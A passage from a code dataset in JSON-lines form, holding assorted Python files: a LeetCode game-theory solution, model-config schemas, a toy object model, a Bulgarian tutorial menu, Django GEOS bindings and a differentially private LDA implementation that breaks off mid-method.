Moss\\\\PycharmProjects\\\\Rangers_Survey_2\\\\SwUE_on_strikes_by_pitcher.csv')\n","sub_path":"Swinging_On_Strikes.py","file_name":"Swinging_On_Strikes.py","file_ext":"py","file_size_in_byte":1360,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"162969229","text":"\"\"\"\n1. Recusive solution\n2. 
DP solution\nIdeas are same, when player 1 picks, picks the largest, when player 2 picks, picks the largest too, so nums[0] - helper(nums[1:]).\nSince the value for player 2 is not good for player 1.\ndp[i][j] means the best value from index i to index j of nums, for player 1\nThe dp solution updates the values by slide length.\n\"\"\"\nclass Solution(object):\n def PredictTheWinner(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: bool\n \"\"\"\n memories = {}\n def helper(nums):\n if len(nums) <= 1:\n return sum(nums)\n numsTuple = tuple(nums)\n if numsTuple in memories:\n return memories[numsTuple]\n temp = max(nums[0] - helper(nums[1:]), nums[-1] - helper(nums[:-1]))\n memories[numsTuple] = temp\n return temp\n return helper(nums) >= 0\n\n\nclass Solution(object):\n def PredictTheWinner(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: bool\n \"\"\"\n dp = [[0] * len(nums) for i in range(len(nums))]\n for i in range(len(nums)):\n dp[i][i] = nums[i]\n for slideLength in range(1, len(nums)):\n for i in range(0, len(nums) - slideLength):\n j = i + slideLength\n dp[i][j] = max(nums[i] - dp[i+1][j], nums[j] - dp[i][j-1])\n return dp[0][-1] >= 0\n","sub_path":"solution/python/486.py","file_name":"486.py","file_ext":"py","file_size_in_byte":1408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"490396694","text":"#\n# Copyright (c) 2020 Intel Corporation\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n\nfrom marshmallow import Schema, fields, validates_schema, ValidationError, post_load, validate\n\n\nclass ModelOvmsMappingSchema(Schema):\n model_name = fields.String(required=True)\n model_version = fields.Integer(required=True)\n\n\nclass ModelInputConfiguration:\n def __init__(self, input_name: str, channels: int = None,\n target_height: int = None, target_width: int = None,\n color_format: str = 'BGR', scale: float = None,\n standardization: bool = False, input_format: str = 'NCHW'):\n self.input_name = input_name\n self.channels = channels\n self.target_height = target_height\n self.target_width = target_width\n self.reverse_input_channels = True if color_format == 'BGR' else False\n self.scale = scale\n self.standardization = standardization\n self.channels_first = False if input_format == 'NHWC' else True\n\n def as_preprocessing_options(self) -> dict:\n return {\n 'channels': self.channels,\n 'target_size': (self.target_height, self.target_width)\n if self.target_height and self.target_width else None,\n 'channels_first': self.channels_first,\n 'scale': self.scale,\n 'standardization': self.standardization,\n 'reverse_input_channels': self.reverse_input_channels\n }\n\n\nclass ModelInputConfigurationSchema(Schema):\n input_name = fields.String(required=True)\n channels = fields.Integer(required=False)\n target_height = fields.Integer(required=False)\n target_width = fields.Integer(required=False)\n color_format = fields.String(\n required=False, validate=validate.OneOf({'BGR', 'RGB'}))\n scale = 
fields.Float(required=False,\n validate=validate.Range(min=0, min_inclusive=False))\n standardization = fields.Bool(required=False)\n input_format = fields.String(\n required=False, validate=validate.OneOf({'NCHW', 'NHWC'}))\n\n @post_load\n def make_model_input_configuration(self, data, **kwargs):\n return ModelInputConfiguration(**data)\n\n @validates_schema\n def validate_type(self, data, **kwargs):\n if data.get('target_width') and not data.get('target_height'):\n raise ValidationError('target_height must defined if target_width was set. '\n 'Invalid config: {}'.format(data))\n if data.get('target_height') and not data.get('target_width'):\n raise ValidationError('target_width must defined if target_height was set. '\n 'Invalid config: {}'.format(data))\n\n\nclass ModelOutputConfiguration:\n def __init__(self, output_name: str, value_index_mapping: dict = None,\n classes: dict = None, confidence_threshold: float = None,\n top_k_results: int = None, is_softmax=None, value_multiplier=None):\n self.output_name = output_name\n self.value_index_mapping = value_index_mapping\n self.classes = classes\n self.confidence_threshold = confidence_threshold\n self.top_k_results = top_k_results\n self.is_softmax = is_softmax\n self.value_multiplier = value_multiplier\n\n def __str__(self):\n return 'ModelOutputConfiguration({})'.format(vars(self))\n\n def __repr__(self):\n return 'ModelOutputConfiguration({})'.format(vars(self))\n\n\nclass ModelOutputConfigurationSchema(Schema):\n output_name = fields.String(required=True)\n is_softmax = fields.Boolean(required=False)\n value_multiplier = fields.Float(required=False)\n value_index_mapping = fields.Dict(\n keys=fields.String(), values=fields.Integer(), required=False)\n classes = fields.Dict(keys=fields.String(),\n values=fields.Number(), required=False)\n confidence_threshold = fields.Float(\n required=False, validate=validate.Range(min=0, max=1))\n top_k_results = fields.Integer(\n required=False, validate=validate.Range(min=0, min_inclusive=False))\n\n @post_load\n def make_model_output_configuration(self, data, **kwargs):\n return ModelOutputConfiguration(**data)\n\n\nclass ModelConfigurationSchema(Schema):\n endpoint = fields.String(required=True)\n model_type = fields.String(required=True)\n inputs = fields.List(fields.Nested(ModelInputConfigurationSchema, required=True), required=True)\n outputs = fields.List(fields.Nested(ModelOutputConfigurationSchema, required=True), required=True)\n ovms_mapping = fields.Nested(ModelOvmsMappingSchema, required=True)\n","sub_path":"extras/ams_wrapper/src/api/models/model_config.py","file_name":"model_config.py","file_ext":"py","file_size_in_byte":5150,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"381705579","text":"import random\n\nhanguls = list(\"민경수진욱상은채섭철건예\")\n\nwith open(\"./studyPython/data/result.txt\", \"w\") as f:\n f.write(\"{}, {}, {}\\n\".format(\"이름\", \"몸무게\", \"키\"))\n \n for i in range(1000):\n name = random.choice(hanguls) + random.choice(hanguls)\n weight = random.randrange(40, 100)\n height = random.randrange(150, 200)\n\n f.write(\"{}, {}, {}\\n\".format(name, weight, height))\n\nprint(\"파일생성이 완료되었습니다.\")","sub_path":"StudySeries/pythonNew/studyPython/chap5/chap5_3_4.py","file_name":"chap5_3_4.py","file_ext":"py","file_size_in_byte":481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"125807239","text":"class GTTypeNotDetected(Exception):\n '''Raised when Global Tag object 
tries to detect own type and fails'''\n    pass\n\nclass GlobalTag(object):\n\n    # map between relval process and GT type\n    RELVALMAP = dict() #getWfList\n    RELVALMAP['mc'] = ['29', '35']\n    RELVALMAP['ideal'] = ['29', '35']\n    RELVALMAP['startup'] = ['29', '35']\n    RELVALMAP['hlt'] = ['4.291']\n    RELVALMAP['data'] = ['4.17']\n    RELVALMAP['cosmics'] = ['4.22']\n    RELVALMAP['hi'] = ['40', '41', '42']\n    RELVALMAP['express'] = ['4.17']\n    RELVALMAP['prompt'] = ['1000', '4.17']\n\n    def __init__(self, name, gt_type):\n        '''If gt_type is None, the type is autodetected'''\n        self._name = str(name)\n        self._type = gt_type\n\n        if self._type is None:\n            self._detect_gt_type()\n\n        self._detect_gt_options()\n\n    def _detect_gt_type(self):\n        # determine the type from the GT name\n        if \"_H_\" in self._name:\n            self._type = 'hlt'\n        elif \"DESIGN\" in self._name:\n            self._type = 'ideal'\n        elif \"MC\" in self._name:\n            self._type = 'mc'\n        elif \"STARTHI\" in self._name:\n            self._type = 'hi'\n        elif \"START\" in self._name:\n            self._type = 'startup'\n        elif \"GR_R\" in self._name or \"FT\" in self._name:\n            self._type = 'data'\n        elif \"CRFT\" in self._name or \"CRAFT\" in self._name:\n            self._type = 'cosmics'\n        elif \"GR_E_\" in self._name:\n            self._type = 'express'\n        elif \"GR_P_\" in self._name:\n            self._type = 'prompt'\n        elif \"POST\" in self._name:\n            self._type = 'mc'\n\n        else:\n            raise GTTypeNotDetected(\"Could not detect gt type for \" + self._name)\n\n    def _detect_gt_options(self):\n        self._is_online = (self._type == 'hlt')\n        self._is_monte_carlo = (self._type == 'ideal') or\\\n                               (self._type == 'startup') or\\\n                               (self._type == 'mc') or\\\n                               (self._type == 'hi')\n\n\n    @property\n    def name(self):\n        return self._name\n\n    @property\n    def isOnline(self):\n        return self._is_online\n\n    @property\n    def isMC(self):\n        return self._is_monte_carlo\n\n    @property\n    def relval(self):\n        return self.RELVALMAP[self._type]\n\n    @property\n    def type(self):\n        return self._type","sub_path":"common/globaltag.py","file_name":"globaltag.py","file_ext":"py","file_size_in_byte":2371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"478631476","text":"import glob\nimport json\nfrom spacy.lang.en import English\n\nnlp = English()\nnlp.add_pipe(nlp.create_pipe('sentencizer'))\n\npaths = [\"/data/RACE/train/high\", \"/data/RACE/train/middle\"]\n\nwith open(\"result.txt\", 'a', encoding='utf-8') as wr:\n    for path in paths:\n        filenames = glob.glob(path + \"/*txt\")\n        for filename in filenames:\n            with open(filename, 'r', encoding='utf-8') as fpr:\n                data_raw = json.load(fpr)\n            doc = nlp(data_raw['article'])\n            for sent in doc.sents:\n                text = sent.text.strip('\\n')\n                wr.writelines(text)\n                wr.writelines(\"\\n\")\n            wr.writelines(\"\\n\")\n","sub_path":"preprocess/convert_passage_to_line.py","file_name":"convert_passage_to_line.py","file_ext":"py","file_size_in_byte":693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"604056961","text":"# -*- coding: utf-8 -*-\nclass Base(object):\n    \"\"\"\n    Implements the methods shared by all classes, such as read_attr and write_attr.\n    Every class inherits from this base class to get the common interface.\n    \"\"\"\n\n    def __init__(self, cls, fields):\n        \"\"\"\n        cls is the class that created the instance\n        fields holds the instance's attributes\n        \"\"\"\n        self.cls = cls\n        self._fields = fields\n\n    # _read_dict and _write_dict:\n    # before Instance's storage scheme was changed, I assumed these were unnecessary;\n    # after the change, the magic of these two functions shows:\n    # a subclass can read and store attributes with its own implementation\n    # without affecting read_attr and write_attr.\n    # The abstraction layers from SICP.\n    def _read_dict(self, fieldname):\n        return self._fields.get(fieldname, MISSING)\n\n    def _write_dict(self, fieldname, value):\n        self._fields[fieldname] = value\n\n    def read_attr(self, fieldname):\n        # look it up in the instance's attribute dict\n        result = self._read_dict(fieldname)\n        if result is not MISSING:\n            return result\n\n        # look it up in the attribute dict of the class that created the instance\n        result = self.cls._read_from_class(fieldname)\n        if _is_bindable(result):\n            return _make_boundmethod(result, self)\n        if result is not MISSING:\n            return result\n\n        # fall back to __getattr__\n        meth = self.cls._read_from_class(\"__getattr__\")\n        if meth is not MISSING:\n            return meth(self, fieldname)\n\n        # raise if nothing was found\n        raise AttributeError(\n            \"class %s doesn't have %s attribute\" % (self.cls.class_name, fieldname)\n        )\n\n    def write_attr(self, fieldname, value):\n        \"\"\"\n        First look for a descriptor instance and call its __set__;\n        then look up __setattr__: if the class defines one, it is called,\n        otherwise OBJECT's __setattr__ attribute is used\n        \"\"\"\n        field = self.cls._read_from_class(fieldname)\n        if hasattr(field, \"__set__\"):\n            field.__set__(self, value)\n        meth = self.cls._read_from_class(\"__setattr__\")\n        meth(self, fieldname, value)\n\n    def isinstance(self, cls):\n        \"\"\"\n        Check whether this instance is an instance of the given class.\n        As the __init__ methods of the Class and Instance classes show,\n        self.cls is the class that created the instance,\n        so an instance belongs to a given class exactly when\n        the class that created it is a subclass of that cls.\n        \"\"\"\n        return self.cls.issubclass(cls)\n\n    def callmethod(self, method, *args):\n        m = self.read_attr(method)\n        return m(*args)\n\n\nMISSING = object()\n\n\ndef _is_bindable(method):\n    # 1. a callable attribute method has a __get__ attribute (it comes from the function class)\n    # 2. an instance of a descriptor that implements __get__ also has this __get__ attribute\n    return hasattr(method, \"__get__\")\n\n\ndef _make_boundmethod(method, self):\n    \"\"\"\n    This closure idiom is worth studying:\n    the argument is added implicitly at call time, so after binding fewer parameters need to be passed\n    \"\"\"\n\n    # def bound(*args):\n    #     return method(self, *args)\n    #\n    # return bound\n\n    # 1. what is the result when method is an attribute method of the class that created the instance?\n    # 2. and what if method is a class attribute that happens to be a descriptor instance?\n    # A class's attribute methods bind self through the method's __get__,\n    # which returns a bound method.\n    # Ordinary functions are descriptors too, but cannot bind anything here;\n    # no example found so far that proves it.\n    return method.__get__(self, None)\n\n\ndef _hasattr(obj, attr):\n    try:\n        obj.read_attr(attr)\n        return True\n    except AttributeError:\n        return False\n\n\nclass Class(Base):\n    \"\"\"\n    Creates a user-defined class\n    \"\"\"\n\n    def __init__(self, class_name, base_class, fields, metaclass):\n        # this user-defined class is created by the metaclass;\n        # fields holds the attributes of this user-defined class\n        Base.__init__(self, metaclass, fields)\n        self.name = class_name\n        if isinstance(base_class, tuple):\n            self.base_class = base_class\n        else:\n            self.base_class = (base_class,)\n        self.class_name = class_name\n\n    def method_resolution_order(self):\n        \"\"\"\n        The MRO determines all parent classes of a class.\n        Multiple inheritance is supported; classes are resolved depth-first.\n        \"\"\"\n        rv = [self]\n        for base_class in self.base_class:\n            if base_class is not None:\n                rv += base_class.method_resolution_order()\n        return rv\n\n    def issubclass(self, cls):\n        return cls in self.method_resolution_order()\n\n    def _read_from_class(self, method):\n        for cls in self.method_resolution_order():\n            if method in cls._fields:\n                return cls._fields[method]\n        return MISSING\n\n\nclass Map(object):\n    \"\"\"\n    Stores the attribute layout shared by different instances of the same class\n    \"\"\"\n\n    def __init__(self, attrs):\n        self.attrs = attrs\n        self.next_maps = {}\n\n    def get_index(self, fieldname):\n        return self.attrs.get(fieldname, MISSING)\n\n    def next_map(self, fieldname):\n        assert fieldname not in self.attrs\n        if fieldname in self.next_maps:\n            return self.next_maps[fieldname]\n        attrs = self.attrs.copy()\n        attrs[fieldname] = len(attrs)\n        result = self.next_maps[fieldname] = Map(attrs)\n        return result\n\n\nEMPTY_MAP = Map({})\n\n\nclass Instance(Base):\n    \"\"\"\n    Creates an instance of a user-defined class\n    \"\"\"\n\n    def __init__(self, cls, *args):\n        assert isinstance(cls, Class)\n        Base.__init__(self, cls, None)\n        self.map = EMPTY_MAP\n        self.storage = []\n\n        init_method = self.read_attr(\"__init__\")\n        init_method(self, *args)\n\n    def _read_dict(self, fieldname):\n        index = self.map.get_index(fieldname)\n        if index != MISSING:\n            return self.storage[index]\n        return MISSING\n\n    def _write_dict(self, fieldname, value):\n        index = self.map.get_index(fieldname)\n        if index != MISSING:\n            self.storage[index] = value\n        else:\n            new_map = self.map.next_map(fieldname)\n            self.storage.append(value)\n            self.map = new_map\n\n\n# The object class:\n# object is the base class of every class, so object has no parent class.\n# The type class:\n# type is the class that creates every class (the metaclass),\n# so type's parent class is object.\n# The special part: object's creating class is type, and type's metaclass is type.\ndef OBJECT__setattr__(self, key, value):\n    self._write_dict(key, value)\n\n\ndef OBJECT__init__(self, *args):\n    pass\n\n\nOBJECT = Class(\n    class_name=\"object\", base_class=None, metaclass=None,\n    fields={\n        \"__setattr__\": OBJECT__setattr__,\n        \"__init__\": OBJECT__init__\n    }\n)\nTYPE = Class(class_name=\"type\", base_class=OBJECT, fields={}, metaclass=None)\nOBJECT.cls = TYPE\nTYPE.cls = TYPE\n","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":6865,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"450930710","text":"# find the prime numbers of a certain range\n# and put them in a list\nprimes = [] #empty list\nn=int(input('Enter the number :'))\nfor n in range(2,n):\n    ans = True\n    for i in range(2,n):\n        if n%i==0:\n            ans=False\n            break\n    if ans == True:\n        primes.append(n) #add to list if prime\n\nprint('Prime Numbers=',primes)\n","sub_path":"no.inlist.py","file_name":"no.inlist.py","file_ext":"py","file_size_in_byte":347,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"582571011","text":"#!/usr/bin/python3.5\n\n# Includes\nimport os # Using it for clearing the screen\nimport time # Using it for delays\nimport sys # Using it for displaying chars 1 by 1\nexec(open('/root/Desktop/Python/Kurs/inc/floor.py').read()) # Including everything from floor.py file\nexec(open('/root/Desktop/Python/Kurs/inc/logical-operators.py').read())\nexec(open('/root/Desktop/Python/Kurs/inc/boolean.py').read())\nexec(open('/root/Desktop/Python/Kurs/inc/getkey.py').read())\n# Global variables\nscore = 0 # declaring a global variable score used for the True & False test\ncurrent_exercise = 'Main Menu' # declaring a global variable \n# This is the main part of the program\n# Only the menu is coded here!\n# by me ofc! xD\n\n# START OF MAIN MENU\ndef main_menu():\n\tos.system('clear')\n\tmenu_text = 'Python Tutorial\\nот мен за теб :)\\n\\n\\n1. Гладен ли си? [Floor division]\\n2. Тест. [Boolean expressions and modulus]\\n3. На колко години сте? [Logical operators]\\n4. Рисуване. [Turtle]\\n\\nX. Изход.\\n'\n\tfor char in menu_text:\n\t\tsys.stdout.write(char)\n\t\tsys.stdout.flush()\n\t\ttime.sleep(.1)\n\n\tuserChoice = input('Моля въведете вашият избор: ') # Waiting for user input\n\n\tif userChoice == '1':\n\t\tos.system('clear')\n\t\tfloor_div()\n\telif userChoice =='2':\n\t\tos.system('clear')\n\t\ttest_ex()\n\telif userChoice == '3':\n\t\tlifeQ()\n\telif userChoice == 'x' or userChoice == 'X' or userChoice == 'Exit' or userChoice == 'exit':\n\t\tos.system('clear') # clearing the screen\n\t\tprint('You are exiting the program...')\n\t\ttime.sleep(3) # delay for 3 seconds\n\t\tprint('Goodbye!')\n\t\ttime.sleep(3) # delay for 3 seconds\n\t\tos.system('clear')\n\t\texit() # exiting the program\n\telse:\n\t\tos.system('clear')\n\t\tprint('Грешна опция! 
Моля опитайте отново.')\n\t\ttime.sleep(5)\n\t\tos.system('clear')\n\t\tmain_menu()\n\n# END OF MAIN MENU\nmain_menu() # Executing the function\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1908,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"405283745","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /tmp/pip-install-jkXn_D/django/django/contrib/gis/geos/prototypes/misc.py\n# Compiled at: 2018-07-11 18:15:30\n\"\"\"\n This module is for the miscellaneous GEOS routines, particularly the\n ones that return the area, distance, and length.\n\"\"\"\nfrom ctypes import c_int, c_double, POINTER\nfrom django.contrib.gis.geos.libgeos import GEOM_PTR, GEOS_PREPARE\nfrom django.contrib.gis.geos.prototypes.errcheck import check_dbl, check_string\nfrom django.contrib.gis.geos.prototypes.geom import geos_char_p\nfrom django.contrib.gis.geos.prototypes.threadsafe import GEOSFunc\nfrom django.utils.six.moves import xrange\n__all__ = [\n 'geos_area', 'geos_distance', 'geos_length']\n\ndef dbl_from_geom(func, num_geom=1):\n \"\"\"\n Argument is a Geometry, return type is double that is passed\n in by reference as the last argument.\n \"\"\"\n argtypes = [ GEOM_PTR for i in xrange(num_geom) ]\n argtypes += [POINTER(c_double)]\n func.argtypes = argtypes\n func.restype = c_int\n func.errcheck = check_dbl\n return func\n\n\ngeos_area = dbl_from_geom(GEOSFunc('GEOSArea'))\ngeos_distance = dbl_from_geom(GEOSFunc('GEOSDistance'), num_geom=2)\ngeos_length = dbl_from_geom(GEOSFunc('GEOSLength'))\nif GEOS_PREPARE:\n geos_isvalidreason = GEOSFunc('GEOSisValidReason')\n geos_isvalidreason.argtypes = [GEOM_PTR]\n geos_isvalidreason.restype = geos_char_p\n geos_isvalidreason.errcheck = check_string\n __all__.append('geos_isvalidreason')","sub_path":"pycfiles/ka_lite_static-0.17.5-py2-none-any/misc.py","file_name":"misc.py","file_ext":"py","file_size_in_byte":1588,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"280030637","text":"from typing import Dict\n\nimport numpy as np\nimport opt_einsum as oe\nimport tensorly\nfrom scipy import sparse\nfrom tensorly.decomposition import parafac\n\nfrom .helpers import noiser, proj_l1_simplex, euclidean_proj_simplex\nfrom .misc import *\n\n\nclass DPSLatentDirichletAllocation:\n\tdef __init__(\n\t\t\tself,\n\t\t\tn_topics: int,\n\t\t\tdoc_topic_prior,\n\t\t\t_alpha0 = None,\n\t\t\tvariances: Dict = {},\n\t\t\tl1_simplex_projection: bool = True,\n\t):\n\t\t\"\"\"\n\t\t:param n_topics: Number of topics.\n\t\t:param doc_topic_prior: Prior of document topic distribution. 
Also called alpha.\n\t\t:param variances: Noise variances configured to a given set of edges.\n\t\t:param l1_simplex_projection: Boolean condition illustrating projection of beta to simplex.\n\t\t\"\"\"\n\t\tself.n_topics = int(n_topics)\n\t\tself.doc_topic_prior = doc_topic_prior\n\t\tself._alpha0 = _alpha0\n\t\tself.variances = variances\n\t\tself.l1_simplex_projection = l1_simplex_projection\n\n\tdef __repr__(self):\n\t\treturn f'{self.__class__.__name__}(n_topics={self.n_topics}, doc_topic_prior={self.doc_topic_prior})'\n\n\tdef calculate_moment2(self):\n\t\tpass\n\n\tdef fit(self, document_word_counts):\n\t\t\"\"\"\n\t\t:param document_word_counts: Document Word Count Matrix\n\t\t:return:\n\t\t\"\"\"\n\t\tself.document_word_counts = document_word_counts\n\t\tif not hasattr(self, 'whitener') or not hasattr(self, 'unwhitener'):\n\t\t\tprint('Whitener and Unwhitener not cached. Calculating from scratch...')\n\t\t\tself.m2_eigenvalues, self.m2_eigenvectors = self.decompose_moment2()# TODO: Compute actual M2\n\t\t\tself.whitener = self.create_whitener()\n\t\t\tself.unwhitener = self.create_unwhitener()\n\t\tif self.n_words > self.n_words_threshold:\n\t\t\tprint('vocabulary size too large, skip generating raw M3, generate whitened M3 directly')\n\t\t\tself.whitened_moment3 = self.create_whitened_moment3()\n\t\telse:\n\t\t\tprint('vocabulary size small, generating raw M3, then whiten it')\n\t\t\tself.moment3 = self.create_moment3()\n\t\t\tself.whitened_moment3 = self.whiten_moment3()\n\n\t\tself.factors = self.decompose_moment3()\n\t\tself.m3_eigenvalues = np.linalg.norm(self.factors[0], axis=0)\n\t\tself.factors[0] /= self.m3_eigenvalues\n\t\tassert np.allclose(np.linalg.norm(self.factors[0], axis=0), 1)\n\n\t\tself.unique_factor = self.factor_correct_sign()\n\n\t\tself.doc_topic_posterior = (1 / (self.m3_eigenvalues ** 2))[::-1]# problematic\n\t\tself.topic_word_distribution = self.create_topic_word_distribution() # how does this work?\n\t\t#breakpoint()\n\t\t#print('self.factors', self.factors[0])\n\t\t#print('self.unique_factor', self.unique_factor)\n\t\t#print('self.m3_eigenvalues',self.m3_eigenvalues)\n\t\t# print('norm(T-T_hat)', np.linalg.norm(,ord=1))\n\t\t# print('self.topic_word_distribution before projection',self.topic_word_distribution)\n\n\t\tif self.l1_simplex_projection:\n\t\t\tfor i in range(self.n_topics):\n\t\t\t\ttry:\n\t\t\t\t\t#self.topic_word_distribution[:, i] = proj_l1_simplex(self.topic_word_distribution[:, i])\n\t\t\t\t\tself.topic_word_distribution[:, i] = euclidean_proj_simplex(self.topic_word_distribution[:, i])\n\t\t\t\texcept Exception as e:\n\t\t\t\t\tprint(e)\n\n\t\tself.topic_word_distribution = self.topic_word_distribution[:, ::-1]\n\t\t# print('l1_projection..')\n\t\t# print('self.topic_word_distribution after projection',self.topic_word_distribution)\n\n\t@property\n\tdef moment1(self):\n\t\t\"\"\"\n\t\tFirst moment of document word count matrix.\n\t\t:return:\n\t\t\"\"\"\n\t\tm1 = self.document_word_proportions.sum(axis=0) / self.n_docs\n\t\t## m1 should be a vector, but if a sparse representation was used\n\t\t## to create it, it would have 2 dims instead of 1. 
We use this to convert\n\t\t## from matrix to vector\n\t\tif len(m1.shape) > 1:\n\t\t\tm1 = m1.A1\n\t\treturn m1\n\n\t@property\n\tdef n_words_threshold(self):\n\t\treturn 200\n\t\n\t@property\n\tdef n_partitions(self):\n\t\treturn 1\n\n\t# @seed(44)\n\tdef decompose_moment2(self):\n\t\t\"\"\"\n\t\tThis method approximates the second moment by using power iteration\n\t\tand computes a truncated SVD on it.\n\t\t:return:\n\t\t\"\"\"\n\t\tif self.n_words > self.n_words_threshold:\n\t\t\tprint('vocabulary size too large, using rand_svd')\n\t\t\treturn rand_svd(self.document_word_counts, self.alpha0, self.k, docs_m1=self.moment1, n_iter=3, n_partitions=self.n_partitions)\n\t\telse:\n\t\t\tprint('vocabulary size small, using compute_raw_M2')\n\t\t\treturn compute_raw_M2(self.document_word_counts, self.alpha0)\n\n\tdef create_whitened_moment3(self):\n\t\tif not hasattr(self, 'whitened_moment3'):\n\t\t\tprint('moment 3 not cached, whitening moment3')\n\t\t\tthe_whitened_m3 = whiten_m3(self.document_word_counts, self.whitener, self._alpha0, docs_m1=self.moment1, n_partitions=self.n_partitions)\n\t\t\tthe_whitened_m3 *= self.alpha0 * (self.alpha0 + 1) * (self.alpha0 + 2) / 2\n\t\t\tthe_whitened_m3 = the_whitened_m3.reshape((self.k, self.k, self.k))\n\t\t\treturn the_whitened_m3\n\t\telse:\n\t\t\tprint('moment3 cached, returning cached moment3.')\n\t\t\treturn self.whitened_moment3\n\n\t# @seed(43)\n\t@noiser(edge='e3')\n\tdef create_moment3(self):\n\t\t\"\"\"\n\t\tCreates the third moment.\n\t\t:return:\n\t\t\"\"\"\n\n\t\tdef term1():\n\n\t\t\t# clip zero counts to 1 to avoid divide by zero errors.\n\t\t\tl_ns_min_1 = self.l_ns - 1\n\t\t\tl_ns_min_1[l_ns_min_1 == 0] = 1\n\t\t\tl_ns_min_2 = self.l_ns - 2\n\t\t\tl_ns_min_2[l_ns_min_2 == 0] = 1\n\n\t\t\tscaling_factor = 1 / (self.l_ns * (l_ns_min_1) * (l_ns_min_2))\n\t\t\tscaled_document_word_counts = scaling_factor * self.document_word_counts\n\n\t\t\tpart1 = oe.contract(\n\t\t\t\t'ij,ik,il->jkl',\n\t\t\t\tscaled_document_word_counts,\n\t\t\t\tself.document_word_counts,\n\t\t\t\tself.document_word_counts,\n\t\t\t)\n\n\t\t\trho = oe.contract('ij,ik->jk', scaled_document_word_counts,\n\t\t\t self.document_word_counts)\n\t\t\tpart2 = np.zeros((self.n_words, self.n_words, self.n_words))\n\t\t\tdiagonal_indices = np.diag_indices(self.n_words, ndim=2)\n\t\t\tfor i, item in enumerate(rho):\n\t\t\t\tpart2[i][diagonal_indices] = item\n\t\t\tpart2 += oe.contract('ijk->jik', part2) + oe.contract('ijk->kji', part2)\n\n\t\t\tpart3 = np.zeros((self.n_words, self.n_words, self.n_words))\n\t\t\tpart3[np.diag_indices(self.n_words, ndim=3)] = 2 * scaled_document_word_counts.sum(axis=0)\n\n\t\t\treturn (part1 - part2 + part3) / self.n_docs\n\n\t\tdef term2():\n\n\t\t\t# clip zero counts to 1 to avoid divide by zero errors.\n\t\t\tl_ns_min_1 = self.l_ns - 1\n\t\t\tl_ns_min_1[l_ns_min_1 == 0] = 1\n\t\t\t\n\t\t\tscaling_factor = 1 / (self.l_ns * (l_ns_min_1))\n\t\t\tscaled_document_word_counts = scaling_factor * self.document_word_counts\n\n\t\t\tpart1 = oe.contract('i,jk,jl->ikl', self.moment1,\n\t\t\t scaled_document_word_counts,\n\t\t\t self.document_word_counts)\n\t\t\tpart1 += oe.contract('ijk->kij', part1) + oe.contract('ijk->jki', part1)\n\n\t\t\trho = oe.contract('i,j->ij', scaled_document_word_counts.sum(axis=0),\n\t\t\t self.moment1)\n\t\t\tpart2 = np.zeros((self.n_words, self.n_words, self.n_words))\n\t\t\tdiagonal_indices = np.diag_indices(self.n_words, ndim=2)\n\t\t\tfor i, item in enumerate(rho):\n\t\t\t\tpart2[i][diagonal_indices] = item\n\t\t\tpart2 += 
oe.contract('ijk->jik', part2) + oe.contract('ijk->kji', part2)\n\n\t\t\treturn (self.alpha0 / (self.alpha0 + 2)) * (\n\t\t\t\t\tpart1 - part2) / self.n_docs\n\n\t\tdef term3():\n\t\t\tmoment1 = self.moment1\n\t\t\treturn 2 * ((self.alpha0 ** 2) / (\n\t\t\t\t\t(self.alpha0 + 1) * (self.alpha0 + 2))) * oe.contract(\n\t\t\t\t'i,j,k->ijk', moment1,\n\t\t\t\tmoment1, moment1)\n\n\t\treturn (self.alpha0 * (self.alpha0 + 1) * (self.alpha0 + 2) / 2) * (\n\t\t\tterm1() - term2() + term3())\n\n\t# @seed(48)\n\t@noiser(edge='e6', symmetric=True)\n\tdef whiten_moment3(self):\n\t\t\"\"\"\n\t\tWhitens the third moment.\n\t\t:return: k by k by k tensor\n\t\t\"\"\"\n\t\treturn tensorly.tenalg.multi_mode_dot(self.moment3, np.array(\n\t\t\t[self.whitener.T for _ in range(3)]))\n\n\t# @seed(49)\n\t@noiser(edge='e7')\n\tdef decompose_moment3(self):\n\t\t\"\"\"\n\t\tPerforms CP decomposition on third moment.\n\t\t:return:\n\t\t\"\"\"\n\t\t#if self.n_words > self.n_words_threshold:\n\t\t#\tfactors = parafac(self.whitened_moment3, self.n_topics)\n\t\t#else:\n\t\tfactors = np.array(parafac(self.whitened_moment3, self.n_topics).factors)\n\t\treturn factors #np.sort(factors)[::-1] # what does the sort do?\n\n\tdef factor_correct_sign(self):\n\t\t\"\"\"\n\t\tMagic\n\t\t:return:\n\t\t\"\"\"\n\t\tfactor = np.zeros((self.n_topics, self.n_topics))\n\t\tfor i in range(self.n_topics):\n\t\t\tdiff = [\n\t\t\t\tnp.linalg.norm(self.factors[1][:, i] - self.factors[2][:, i]),\n\t\t\t\tnp.linalg.norm(self.factors[0][:, i] - self.factors[2][:, 